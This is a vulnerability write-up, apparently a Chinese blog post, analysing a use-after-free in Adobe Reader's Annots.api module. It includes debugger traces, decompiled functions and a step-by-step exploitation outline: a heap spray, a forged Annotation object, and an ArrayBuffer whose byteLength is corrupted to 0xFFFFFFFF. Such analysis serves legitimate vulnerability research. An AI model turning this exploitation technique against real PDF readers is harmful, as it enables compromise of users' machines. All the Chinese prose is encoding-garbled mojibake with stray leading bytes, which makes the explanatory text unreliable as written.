I"Ói<h1 id="å‰è¨€">å‰è¨€</h1>

<p>è¯¥æ¼æ´ä¸º2021å¹´å¤©åºœæ¯ä¸­ä½¿ç”¨çš„Adobe Reader UAFæ¼æ´ï¼Œæ¼æ´ä½äº<code class="language-plaintext highlighter-rouge">Annots.api</code>æ¨¡å—ï¼Œå¯¹åº”çš„Adobe Readerç‰ˆæœ¬ä¸ºï¼š21.007.20099ã€‚<!--more--></p>

<h1 id="åŸç†åˆ†æ">åŸç†åˆ†æ</h1>

<p>å¼€å¯pageheapåï¼Œæ‰“å¼€POCï¼Œå´©æºƒäº<code class="language-plaintext highlighter-rouge">Annots+6aabb</code>å¤„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
(18b8.136c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04afc5fc ebx=4ac2cffc ecx=567e8fa0 edx=04afc574 esi=57536ff4 edi=567e8fa0
eip=6c55aabb esp=04afc5e8 ebp=04afc608 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
Annots!PlugInMain+0x4cc8b:
6c55aabb 8b772c          mov     esi,dword ptr [edi+2Ch] ds:002b:567e8fcc=????????
0:000&gt; k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 04afc608 6c5bebd8 Annots!PlugInMain+0x4cc8b
01 04afc640 6c5bc872 Annots!PlugInMain+0xb0da8
02 04afc714 6c5bed43 Annots!PlugInMain+0xaea42
03 04afc72c 6cdf3f47 Annots!PlugInMain+0xb0f13
04 04afc870 6cdd86ff EScript!mozilla::HashBytes+0x421f7
05 04afc8e4 6cdd3495 EScript!mozilla::HashBytes+0x269af
06 04afcd50 6cdd23eb EScript!mozilla::HashBytes+0x21745
07 04afcd94 6cdd22fb EScript!mozilla::HashBytes+0x2069b
08 04afcdd0 6cdd2230 EScript!mozilla::HashBytes+0x205ab
09 04afce04 6cdbb630 EScript!mozilla::HashBytes+0x204e0
0a 04afce54 6cdfa956 EScript!mozilla::HashBytes+0x98e0
0b 04afced8 6cdfa65b EScript!mozilla::HashBytes+0x48c06
0c 04afd08c 6cdf9fd6 EScript!mozilla::HashBytes+0x4890b
0d 04afd0d8 6cdf8db3 EScript!mozilla::HashBytes+0x48286
0e 04afd178 6ce76ebf EScript!mozilla::HashBytes+0x47063
......
</code></pre></div></div>

<p>æŸ¥çœ‹è¯¥å‡½æ•°å¯ä»¥æ˜æ˜¾çœ‹åˆ°ç”±äºthisæŒ‡é’ˆæŒ‡å‘äº†éæ³•åœ°å€å¯¼è‡´ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_DWORD *__thiscall sub_2216AAAD(int this)
{
  _DWORD *v2; // esi

  v2 = *(_DWORD **)(this + 0x2C);	//crash		
  if ( !v2 )
  {
    v2 = (_DWORD *)alloc_0((wchar_t *)this, 0xC, 1);
    if ( v2 )
    {
      *v2 = 0;
      v2[1] = 0;
      *v2 = sub_221234C9(v2);		// åˆå§‹åŒ–v2
    }
    else
    {
      v2 = 0;
    }
    *(_DWORD *)(this + 0x2C) = v2;
  }
  return v2;
}
</code></pre></div></div>

<p>äºæ˜¯å‘ä¸Šå›æº¯æ‰¾åˆ°äº†æ¼æ´å‡½æ•°<code class="language-plaintext highlighter-rouge">Annots+CC5EA</code>ï¼Œè¯¥å‡½æ•°è·å–äº†æŒ‡å‘éæ³•åœ°å€çš„thisæŒ‡é’ˆï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__int16 __thiscall sub_221CC5EA(void *this, wchar_t *a2, wchar_t *a3, int a4)
{
  v19[2] = (uintptr_t)this;
  v24 = (wchar_t *)a4;
  v27 = a3;
  v4 = (wchar_t *)(*(int (__cdecl **)(wchar_t *))(vtable + 0xF4))(a3);// v4 = *a3
  v26 = (wchar_t *)0xFFFFFFFF;
......	//çœç•¥æ— å…³å‡½æ•°
  if ( (int)v26 &gt;= 0 )
    sub_2226B498((void *)dword_22748BEC, v6, v26, (int)&amp;object, v28, v30 != 0, v29);// è·å–Annotationå¯¹è±¡ï¼Œå­˜å‚¨äºobject
  else
    sub_221599FC((char)v6, &amp;object, v28, v30 != 0, v29);
  if ( (unsigned int)((char *)object_end - (char *)object) &lt; 4 )
  {
    (*(void (__cdecl **)(wchar_t *, _DWORD))(vtable + 0x80))(v24, 0);
  }
  else
  {
    addr = (wchar_t *)(*(int (__cdecl **)(unsigned int))(dword_22747444 + 4))(((char *)object_end - (char *)object) &amp; 0xFFFFFFFC);	// malloc object size
    v10 = (int *)object;
    v11 = addr;
    v12 = object_end;
    v27 = addr;
    if ( object != object_end )
    {
      do
      {
        v13 = vtable;
        v14 = sub_221CEBB7(v25, *v10, 0);       // å´©æºƒå‡½æ•°çš„ä¸Šå±‚å‡½æ•°ï¼Œv10å­˜å‚¨çš„æ­£æ˜¯thisæŒ‡é’ˆ
        *(_DWORD *)v11 = (*(int (__thiscall **)(_DWORD, wchar_t *, int, int))(v13 + 0x40))(
                           *(_DWORD *)(v13 + 0x40),
                           v25,
                           1,
                           v14);
        ++v10;
        v12 = object_end;
        v11 += 2;
      }
      while ( v10 != (int *)object_end );
      v10 = (int *)object;
      v11 = v27;
    }
......	//çœç•¥æ— å…³å‡½æ•°
}
</code></pre></div></div>

<p>åœ¨è°ƒè¯•å™¨ä¸­å¯ä»¥æ›´æ¸…æ™°çš„çœ‹åˆ°è¯¥å‡½æ•°é€šè¿‡<code class="language-plaintext highlighter-rouge">sub_2226B498</code>è·å–Annotationå¯¹è±¡çš„è¿‡ç¨‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
Breakpoint 1 hit
eax=0536d704 ebx=2c916bd0 ecx=2bea8ef0 edx=00104004 esi=00000000 edi=57d4afb8
eip=6e9cc80e esp=0536d6cc ebp=0536d7a4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
Annots!PlugInMain+0xae9de:
6e9cc80e e885ec0900      call    Annots!PlugInMain+0x14d668 (6ea6b498)	//è·å–Annotationå¯¹è±¡
0:000&gt; dps esp L6
0536d6cc  2c916bd0
0536d6d0  00000000
0536d6d4  0536d704		//è¯¥å¤„å­˜æ”¾è·å–çš„Annotationå¯¹è±¡
0536d6d8  00000000
0536d6dc  00000000
0536d6e0  00000008
0:000&gt; dd 0536d704 L4	//æœªè·å–å‰ä¸ºç©º
0536d704  00000000 00000000 00000000 3b2c7800
0:000&gt; p
eax=00000002 ebx=2c916bd0 ecx=6ea6b691 edx=00000003 esi=00000000 edi=57d4afb8
eip=6e9cc813 esp=0536d6e4 ebp=0536d7a4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
Annots!PlugInMain+0xae9e3:
6e9cc813 8b8564ffffff    mov     eax,dword ptr [ebp-9Ch] ss:002b:0536d708=6b5c4ff8
0:000&gt; dd 0536d704 L4	//è·å–åˆ°0xCå¤§å°çš„å­˜æ”¾Annotationå¯¹è±¡æŒ‡é’ˆçš„ç»“æ„
0536d704  6b5c4ff0 6b5c4ff8 6b5c5000 3b2c7800
0:000&gt; dd 6b5c4ff0 L4	//è¯¥ç»“æ„å­˜æ”¾äº†ä¸¤ä¸ªAnnotationå¯¹è±¡
6b5c4ff0  809b4fa0 64cfafa0 00000000 00000000
0:000&gt; dd 809b4fa0 L18	//Annots[0]ï¼Œname:aaa
809b4fa0  6ee3616c 00000000 00000000 00000001
809b4fb0  00000000 83f6efb0 69bc8ff8 69bc8ff8
809b4fc0  69bc8ffc 00000000 00000000 83dd4ff0
809b4fd0  00000000 00000000 00000000 00000000
809b4fe0  00000000 00000000 00000000 00000000
809b4ff0  00000000 00000000 00000000 00000000
0:000&gt; dd 64cfafa0 L18	//Annots[1]ï¼Œname:bbb
64cfafa0  6ee3616c 00000000 00000000 00000001
64cfafb0  00000000 8034cfb0 80d48ff8 80d48ffc
64cfafc0  80d48ffc 00000000 00000000 8bdc0ff0
64cfafd0  00000000 00000000 00000000 00000000
64cfafe0  00000000 00000000 00000000 00000000
64cfaff0  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>æ¯ä¸ªAnnotationå¯¹è±¡çš„å¤§å°å‡ä¸º0x60ï¼Œéšåå°†Annots[0]å¯¹è±¡çš„æŒ‡é’ˆä¼ å…¥<code class="language-plaintext highlighter-rouge">sub_221CEBB7</code>ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
Breakpoint 2 hit
eax=85de8ff8 ebx=85de8ff8 ecx=55ae2ff8 edx=01000002 esi=6b5c4ff0 edi=24d74c98
eip=6e9cc86d esp=0536d6d8 ebp=0536d7a4 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
Annots!PlugInMain+0xaea3d:
6e9cc86d e845230000      call    Annots!PlugInMain+0xb0d87 (6e9cebb7)	//sub_221CEBB7ï¼Œå´©æºƒå‡½æ•°çš„ä¸Šå±‚å‡½æ•°
0:000&gt; dps esp L3
0536d6d8  2f8e8fc0
0536d6dc  809b4fa0		//æ­¤æ—¶ä¼ å…¥çš„å‚æ•°æ­£æ˜¯Annots[0]å¯¹è±¡çš„æŒ‡é’ˆ
0536d6e0  00000000
</code></pre></div></div>

<p>ç»§ç»­åˆ†æ<code class="language-plaintext highlighter-rouge">sub_221CEBB7</code>ï¼Œç¬¬ä¸€ä¸ªå‡½æ•°<code class="language-plaintext highlighter-rouge">sub_2216AAAD</code>æ­£æ˜¯å´©æºƒå‡½æ•°ï¼Œè·å–äº†Annotation+0x2Cä½ç½®çš„å€¼ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __stdcall sub_221CEBB7(wchar_t *a1, int object_0, int a3)
{
  int *v4; // esi
  __int16 v5; // cx
  int v6; // eax
  int v7; // esi
  int v8; // edi
  _DWORD *v9; // eax
  _DWORD *v10; // eax
  char v11[8]; // [esp+10h] [ebp-20h] BYREF
  _DWORD *v12; // [esp+18h] [ebp-18h]
  int v13; // [esp+1Ch] [ebp-14h] BYREF
  __int16 v14[5]; // [esp+22h] [ebp-Eh] BYREF
  int v15; // [esp+2Ch] [ebp-4h]

  if ( !object_0 )
    return 0;
  v4 = sub_2216AAAD(object_0);                  // è·å–Annotation+0X2Cï¼Œå´©æºƒå‡½æ•°
  if ( word_2273055C == (__int16)0xFFFF )
    v5 = sub_22123B90(&amp;word_2273055C);
  else
    v5 = word_2273055C;
  v14[0] = v5;
  v6 = updateobj(v4, (int)v11, (unsigned __int16 *)v14);
  v7 = 0;
  v8 = *(_DWORD *)(*(_DWORD *)v6 + 0x14);
  v13 = v8;
  if ( v8 )
    goto LABEL_10;
  v9 = (_DWORD *)alloc_0(0xC, 1);
  v12 = v9;
  v15 = 0;
  if ( v9 )
  {
    v10 = sub_221CA131(v9, a1, object_0, (int)&amp;v13);// markup
    v8 = v13;
    v7 = (int)v10;
  }
  v15 = 0xFFFFFFFF;
  if ( v8 )
  {
LABEL_10:
    if ( !v7 )
      v7 = (*(int (__cdecl **)(int, const wchar_t *))(vtable + 0xCC))(v8, "this");
  }
  if ( a3 )
    *(_DWORD *)a3 = v7;
  return v8;
}
</code></pre></div></div>

<p>åœ¨è°ƒè¯•å™¨ä¸­æ‰§è¡Œåˆ°è¯¥å‡½æ•°ï¼Œä¼ å…¥çš„å‚æ•°ä¸ºAnnots[0]å¯¹è±¡çš„æŒ‡é’ˆï¼Œå› æ­¤èƒ½å¤Ÿæ­£ç¡®è·å–åˆ°Annotation+0x2Cçš„å€¼å¹¶è¿”å›ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; 
eax=0536d6c4 ebx=85de8ff8 ecx=809b4fa0 edx=01000002 esi=6b5c4ff0 edi=24d74c98
eip=6e9cebd3 esp=0536d6a0 ebp=0536d6d0 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
Annots!PlugInMain+0xb0da3:
6e9cebd3 e8d5bef9ff      call    Annots!PlugInMain+0x4cc7d (6e96aaad)
0:000&gt; dd ecx L18
809b4fa0  6ee3616c 00000000 00000000 00000001
809b4fb0  00000000 83f6efb0 69bc8ff8 69bc8ff8
809b4fc0  69bc8ffc 00000000 00000000 83dd4ff0
809b4fd0  00000000 00000000 00000000 00000000
809b4fe0  00000000 00000000 00000000 00000000
809b4ff0  00000000 00000000 00000000 00000000
0:000&gt; p
eax=83dd4ff0 ebx=85de8ff8 ecx=6e96aaf7 edx=01000002 esi=6b5c4ff0 edi=24d74c98
eip=6e9cebd8 esp=0536d6a0 ebp=0536d6d0 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
Annots!PlugInMain+0xb0da8:
6e9cebd8 668b0d5c05f36e  mov     cx,word ptr [Annots!PlugInMain+0x61272c (6ef3055c)] ds:002b:6ef3055c=14c8
0:000&gt; dd 83dd4ff0 L4	//è·å–åˆ°Annotation+0x2Cå¤„çš„å€¼
83dd4ff0  86ed0fe8 00000000 00000000 d0d0d0d0
</code></pre></div></div>

<p>ç»§ç»­å‘ä¸‹æ‰§è¡Œåˆ°<code class="language-plaintext highlighter-rouge">sub_221CA131</code>ï¼Œè¯¥å‡½æ•°ä¼ å…¥äº†Annots[0]å¯¹è±¡çš„æŒ‡é’ˆï¼Œæ‰§è¡Œå®Œæ¯•è¯¥å‡½æ•°å‘ç°Annost[1]å¯¹è±¡è¢«é‡Šæ”¾ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; pc
eax=674eeff0 ebx=85de8ff8 ecx=674eeff0 edx=00000000 esi=00000000 edi=00000000
eip=6e9cec3f esp=0536d694 ebp=0536d6d0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
Annots!PlugInMain+0xb0e0f:
6e9cec3f e8edb4ffff      call    Annots!PlugInMain+0xac301 (6e9ca131)
0:000&gt; dps esp L3
0536d694  2f8e8fc0
0536d698  809b4fa0	//Annots[0]å¯¹è±¡çš„æŒ‡é’ˆ
0536d69c  0536d6bc
0:000&gt; dd 809b4fa0 L18	//Annots[0]
809b4fa0  6ee3616c 00000000 00000000 00000001
809b4fb0  00000000 83f6efb0 69bc8ff8 69bc8ff8
809b4fc0  69bc8ffc 00000000 00000000 83dd4ff0
809b4fd0  00000000 00000000 00000000 00000000
809b4fe0  00000000 00000000 00000000 00000000
809b4ff0  00000000 00000000 00000000 00000000
0:000&gt; dd 64cfafa0 L18	//Annots[1]
64cfafa0  6ee3616c 00000000 00000000 00000001
64cfafb0  00000000 8034cfb0 80d48ff8 80d48ffc
64cfafc0  80d48ffc 00000000 00000000 8bdc0ff0
64cfafd0  00000000 00000000 00000000 00000000
64cfafe0  00000000 00000000 00000000 00000000
64cfaff0  00000000 00000000 00000000 00000000
0:000&gt; p
eax=674eeff0 ebx=85de8ff8 ecx=6e9ca252 edx=09d50000 esi=00000000 edi=00000000
eip=6e9cec44 esp=0536d6a0 ebp=0536d6d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
Annots!PlugInMain+0xb0e14:
6e9cec44 8b7dec          mov     edi,dword ptr [ebp-14h] ss:002b:0536d6bc=69c80fb8
0:000&gt; dd 809b4fa0 L18	//Annots[0]
809b4fa0  6ee3616c 00000000 00000000 00000001
809b4fb0  00000000 83f6efb0 69bc8ff8 69bc8ffc
809b4fc0  69bc8ffc 00000000 00000000 83dd4ff0
809b4fd0  00000000 00000000 00000000 00000000
809b4fe0  00000000 00000000 00000000 00000000
809b4ff0  00000000 00000000 00000000 00000000
0:000&gt; dd 64cfafa0 L18	//Annots[1]
64cfafa0  ???????? ???????? ???????? ????????
64cfafb0  ???????? ???????? ???????? ????????
64cfafc0  ???????? ???????? ???????? ????????
64cfafd0  ???????? ???????? ???????? ????????
64cfafe0  ???????? ???????? ???????? ????????
64cfaff0  ???????? ???????? ???????? ????????
</code></pre></div></div>

<p>è¿”å›åˆ°æ¼æ´å‡½æ•°<code class="language-plaintext highlighter-rouge">sub_221CC5EA</code>ï¼Œä¼šå¾ªç¯æ‰§è¡Œ<code class="language-plaintext highlighter-rouge">sub_221CEBB7</code>ï¼Œç¬¬äºŒæ¬¡æ‰§è¡Œæ—¶åˆ™ä¼ å…¥äº†Annots[1]å¯¹è±¡çš„æŒ‡é’ˆï¼Œè€Œæ­¤æ—¶Annots[1]å¯¹è±¡å·²ç»è¢«é‡Šæ”¾ã€‚å› æ­¤åœ¨è·å–Annots[1]+0x2Cæ—¶ä¾¿ä¼šå‡ºç°éæ³•è®¿é—®å¼‚å¸¸ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
Breakpoint 2 hit
eax=5825aff0 ebx=85de8ffc ecx=55ae2ff8 edx=0536d604 esi=6b5c4ff4 edi=24d74c98
eip=6e9cc86d esp=0536d6d8 ebp=0536d7a4 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
Annots!PlugInMain+0xaea3d:
6e9cc86d e845230000      call    Annots!PlugInMain+0xb0d87 (6e9cebb7)
0:000&gt; dps 0536d6d8 L3
0536d6d8  2f8e8fc0
0536d6dc  64cfafa0	//æ­¤æ—¶ä¼ å…¥çš„å‚æ•°ä¸ºAnnots[1]å¯¹è±¡çš„æŒ‡é’ˆ
0536d6e0  00000000
0:000&gt; g
(135c.14cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0536d68c ebx=85de8ffc ecx=64cfafa0 edx=0536d604 esi=6b5c4ff4 edi=64cfafa0
eip=6e96aabb esp=0536d678 ebp=0536d698 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
Annots!PlugInMain+0x4cc8b:
6e96aabb 8b772c          mov     esi,dword ptr [edi+2Ch] ds:002b:64cfafcc=????????	//è·å–Annots[1]+0x2Cæ—¶å‡ºé”™
</code></pre></div></div>

<p>å…³é—­page heapåå‘ç°æ‰§è¡Œå®Œæ¯•<code class="language-plaintext highlighter-rouge">sub_221CA131</code>åï¼ŒAnnost[1]å¯¹è±¡è¢«containerå†…çš„å­—ç¬¦ä¸²å æ®ï¼Œå¹¶æœ€ç»ˆå´©æºƒäº0x41414141ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; 
eax=0cadbdd0 ebx=0ca3fe58 ecx=0cadbdd0 edx=00000000 esi=00000000 edi=00000000
eip=6e9cec3f esp=0502d4e4 ebp=0502d520 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
Annots!PlugInMain+0xb0e0f:
6e9cec3f e8edb4ffff      call    Annots!PlugInMain+0xac301 (6e9ca131)	//sub_221CA131
0:000&gt; dd 0c8e9170 L18	//Annots[0]
0c8e9170  6ee3616c 00000000 00000000 00000001
0c8e9180  00000000 0ca6db78 0ca40128 0ca40128
0c8e9190  0ca4012c 00000000 00000000 0cadb368
0c8e91a0  00000000 00000000 00000000 00000000
0c8e91b0  00000000 00000000 00000000 00000000
0c8e91c0  00000000 00000000 00000000 00000000
0:000&gt; dd 0c8e8c90 L18	//Annots[1]
0c8e8c90  6ee3616c 00000000 00000000 00000001
0c8e8ca0  00000000 0ca6eca8 0ca40148 0ca4014c
0c8e8cb0  0ca4014c 00000000 00000000 0cadba40
0c8e8cc0  00000000 00000000 00000000 00000000
0c8e8cd0  00000000 00000000 00000000 00000000
0c8e8ce0  00000000 00000000 00000000 00000000
0:000&gt; p
eax=0cadbdd0 ebx=0ca3fe58 ecx=6e9ca252 edx=05210000 esi=00000000 edi=00000000
eip=6e9cec44 esp=0502d4f0 ebp=0502d520 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
Annots!PlugInMain+0xb0e14:
6e9cec44 8b7dec          mov     edi,dword ptr [ebp-14h] ss:002b:0502d50c=0cac1d48
0:000&gt; dd 0c8e9170 L18	//Annots[0]
0c8e9170  6ee3616c 00000000 00000000 00000001
0c8e9180  00000000 0ca6db78 0ca40128 0ca4012c
0c8e9190  0ca4012c 00000000 00000000 0cadb368
0c8e91a0  00000000 00000000 00000000 00000000
0c8e91b0  00000000 00000000 00000000 00000000
0c8e91c0  00000000 00000000 00000000 00000000
0:000&gt; dd 0c8e8c90 L18	//Annots[1]
0c8e8c90  41414141 41414141 41414141 41414141
0c8e8ca0  41414141 41414141 41414141 41414141
0c8e8cb0  41414141 41414141 41414141 41414141
0c8e8cc0  41414141 41414141 41414141 41414141
0c8e8cd0  41414141 41414141 41414141 41414141
0c8e8ce0  41414141 41414141 41414141 00004141
0:000&gt; g
(c0.20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0502d4c4 ebx=0502d512 ecx=41414141 edx=0502d454 esi=41414141 edi=41414141
eip=6e923c60 esp=0502d4a8 ebp=0502d4a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
Annots!PlugInMain+0x5e30:
6e923c60 8b01            mov     eax,dword ptr [ecx]  ds:002b:41414141=????????
</code></pre></div></div>

<p>ç»“åˆPOCçŸ¥æ™“äº†æ¼æ´çš„æˆå› ï¼šæ‰§è¡Œ<code class="language-plaintext highlighter-rouge">doc.getAnnots(0)</code>æ—¶ä¼šè·å–page[0]ä¸Šæ‰€æœ‰çš„Annotationå¯¹è±¡ï¼Œåœ¨è·å–å¯¹è±¡æ—¶ä¼šæŸ¥è¯¢å¯¹è±¡çš„Markupå±æ€§ã€‚ç”±äºaaaå¯¹è±¡åœ¨å‡½æ•°ä¸­è¢«æ·»åŠ ï¼Œä¸”è¯¥å¯¹è±¡çš„Markupå±æ€§ä¸ºå›è°ƒå‡½æ•°ï¼Œå› æ­¤åœ¨è·å–aaaå¯¹è±¡çš„Markupå±æ€§æ—¶ä¼šæ‰§è¡Œè¯¥å›è°ƒå‡½æ•°è°ƒç”¨<code class="language-plaintext highlighter-rouge">bbb.destroy();</code>é‡Šæ”¾bbbå¯¹è±¡ã€‚ç´§æ¥ç€0x60å¤§å°çš„templateå­—ç¬¦ä¸²åˆšå¥½å ä½è¢«é‡Šæ”¾çš„bbbå¯¹è±¡çš„å†…å­˜ï¼Œéšåè·å–bbbå¯¹è±¡æ—¶è®¿é—®äº†templateå­—ç¬¦ä¸²ï¼Œé€ æˆäº†UAFã€‚</p>

<h1 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h1>

<p>UAFæ¼æ´çš„åˆ©ç”¨æ€è·¯ä¸€èˆ¬ä¸ºé€šè¿‡å ä½é‡Šæ”¾çš„å¯¹è±¡å†…å­˜ä½¿å¾—åç»­è§£æä¼ªé€ çš„å¯¹è±¡æ—¶é€ æˆç‰¹å®šåœ°å€è¶Šç•Œå†™æˆ–å†…å­˜é‡Šæ”¾ï¼Œåœ¨è¯¥æ¼æ´ä¸­å¯»æ‰¾åˆ°çš„åˆ©ç”¨æ–¹å¼ä¸ºé‡Šæ”¾æŒ‡å®šå†…å­˜åœ°å€çš„ArrayBufferå¯¹è±¡ï¼Œéšåé€šè¿‡å­—ç¬¦ä¸²å ä½è¯¥å¯¹è±¡å†…å­˜ä¿®æ”¹ArrayBufferå¯¹è±¡çš„byteLengthä¸º0xFFFFFFFFã€‚</p>

<p>ç»§ç»­æ·±å…¥åˆ†æ<code class="language-plaintext highlighter-rouge">sub_221CA131</code>ï¼Œè¯¥å‡½æ•°ä¸ºè·å–Annotationå¯¹è±¡Markupå±æ€§çš„å‡½æ•°ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_DWORD *__thiscall sub_221CA131(_DWORD *this, wchar_t *a2, int obj_annot, int a4)
{
  int v5; // esi
  int v6; // eax
  int v7; // ebx
  __int16 v8; // ax
  int v9; // ecx
  int *v10; // eax
  char v12[8]; // [esp+10h] [ebp-1Ch] BYREF
  _DWORD *v13; // [esp+18h] [ebp-14h]
  __int16 v14[5]; // [esp+1Eh] [ebp-Eh] BYREF
  int v15; // [esp+28h] [ebp-4h]

  v13 = this;
  *this = &amp;CAESAnnot::`vftable';
  v5 = vtable;
  v15 = 0;
  v6 = sub_221D153D(a2);
  v7 = (*(int (__cdecl **)(wchar_t *, _DWORD, _DWORD, int))(v5 + 0x98))(a2, 0, 0, v6);// è°ƒç”¨Markupå›è°ƒå‡½æ•°
  (*(void (__cdecl **)(int, const wchar_t *, _DWORD *))(vtable + 0xC8))(v7, "this", this);// æ£€æŸ¥å‚æ•°
  (*(void (__cdecl **)(int, const wchar_t *, int (__cdecl *)(int)))(vtable + 0xC8))(// æ£€æŸ¥å‚æ•°
    v7,
    "getPDAnnot",
    getPDAnnot);
  this[1] = obj_annot;
  sub_221249E4((int)this);                      // é‡Šæ”¾å†…å­˜
  *(_DWORD *)a4 = v7;
  (*(void (__cdecl **)(wchar_t *, int))(vtable + 0x1AC))(a2, v7);
  v8 = word_2273055C;
  if ( word_2273055C == (__int16)0xFFFF )
    v8 = sub_22123B90(&amp;word_2273055C);
  v9 = this[1];
  v14[0] = v8;
  v10 = sub_2216AAAD(v9);
  *(_DWORD *)(*(_DWORD *)sub_221CA0A5(v10, (int)v12, (unsigned __int16 *)v14) + 0x14) = v7;
  (*(void (__thiscall **)(_DWORD, wchar_t *, int, const wchar_t *))(vtable + 0x15C))(
    *(_DWORD *)(vtable + 0x15C),
    a2,
    v7,
    "Markup");
  *((_WORD *)this + 4) = 1;
  return this;
}
</code></pre></div></div>

<p>å…¶ä¸­<code class="language-plaintext highlighter-rouge">sub_221249E4</code>ä¼ å…¥çš„å‚æ•°ä¸ºè·å–åˆ°çš„Annotationå¯¹è±¡æŒ‡é’ˆï¼Œå†…éƒ¨æ¯”è¾ƒäº†Annots[6]å’ŒAnnots[7]çš„å€¼ï¼Œå¦‚æœä¸€è‡´åˆ™è°ƒç”¨freeå‡½æ•°é‡Šæ”¾Annots[6]å­˜å‚¨çš„å†…å­˜ï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/image-20221124143936130.png" alt="" /></p>

<p>åˆ†æåˆ°è¿™é‡Œï¼Œæ•´ä¸ªåˆ©ç”¨æ€è·¯å°±å¾ˆæ¸…æ™°äº†ï¼š</p>

<ol>
  <li>å †å–·0xffe8å¤§å°çš„ArrayBufferå¯¹è±¡ï¼Œåœ¨0x10100048åœ°å€å¤„ç¨³å®šæ„é€ ä¸€ä¸ªArrayBufferå¯¹è±¡ã€‚</li>
  <li>åœ¨0x10100048çš„ArrayBufferå¯¹è±¡ä¸­ä¼ªé€ ä¸€ä¸ªAnnotationå¯¹è±¡ï¼Œé€šè¿‡å„ç§æ£€æŸ¥æªæ–½ã€‚</li>
  <li>ä¿®æ”¹å ç”¨Annost[1]å¯¹è±¡çš„å­—ç¬¦ä¸²ï¼Œä½¿å¾—Annost[1]+0x18å¤„å’ŒAnnost[1]+0x1Cå¤„åœ°å€ä¸º0x10100048ï¼Œå¹¶å°†Annost[1]+0x2CæŒ‡å‘ArrayBufferå¯¹è±¡ä¸­ä¼ªé€ çš„Annotationå¯¹è±¡ã€‚</li>
  <li>æˆåŠŸé‡Šæ”¾0x10100048çš„ArrayBufferå¯¹è±¡åï¼Œåˆ©ç”¨å­—ç¬¦ä¸²å ä½è¯¥å¤„å†…å­˜ï¼Œå°†byteLengthä¿®æ”¹ä¸º0xFFFFFFFFã€‚</li>
</ol>

<p>æˆåŠŸæ„é€ åæ•´ä¸ªåˆ©ç”¨æµç¨‹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
Breakpoint 1 hit
eax=045dc264 ebx=0be38458 ecx=0c0a9058 edx=00104004 esi=00000000 edi=0d29a0a0
eip=6352c80e esp=045dc22c ebp=045dc304 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
Annots!PlugInMain+0xae9de:
6352c80e e885ec0900      call    Annots!PlugInMain+0x14d668 (635cb498)	//sub_2226B498ï¼Œè·å–Annotationå¯¹è±¡
0:000&gt; dps esp L3
045dc22c  0be38458
045dc230  00000000
045dc234  045dc264
0:000&gt; dd 045dc264 L4
045dc264  00000000 00000000 00000000 ffffffff
0:000&gt; p
eax=00000002 ebx=0be38458 ecx=635cb691 edx=00000003 esi=00000000 edi=0d29a0a0
eip=6352c813 esp=045dc244 ebp=045dc304 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
Annots!PlugInMain+0xae9e3:
6352c813 8b8564ffffff    mov     eax,dword ptr [ebp-9Ch] ss:002b:045dc268=0c48b5a8
0:000&gt; dd 045dc264 L4
045dc264  0c48b5a0 0c48b5a8 0c48b5b0 ffffffff
